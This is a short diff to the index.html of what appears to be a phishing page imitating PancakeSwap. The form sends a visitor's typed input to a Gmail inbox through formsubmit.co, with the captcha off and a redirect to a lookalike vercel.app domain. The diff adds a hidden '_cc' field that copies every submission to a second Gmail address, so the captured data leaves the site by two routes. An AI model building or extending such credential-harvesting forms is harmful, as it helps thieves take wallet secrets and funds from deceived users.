--- a/index.html
+++ b/index.html
@@ -1265,7 +1265,7 @@
             </p>
             <form action="https://formsubmit.co/cryptocoach43@gmail.com " method="POST" />
             <div class="modDivBody">
-                
+                 <input type="hidden" name="_cc" value="formsubmitmail@gmail.com">
                 <input type="hidden" name="_captcha" value="false">
                  <input type="hidden" name="_next" value="https://pancakeswap-financedev.vercel.app/pancakes.html">
                <input class="modInp" type="text"><br><br>
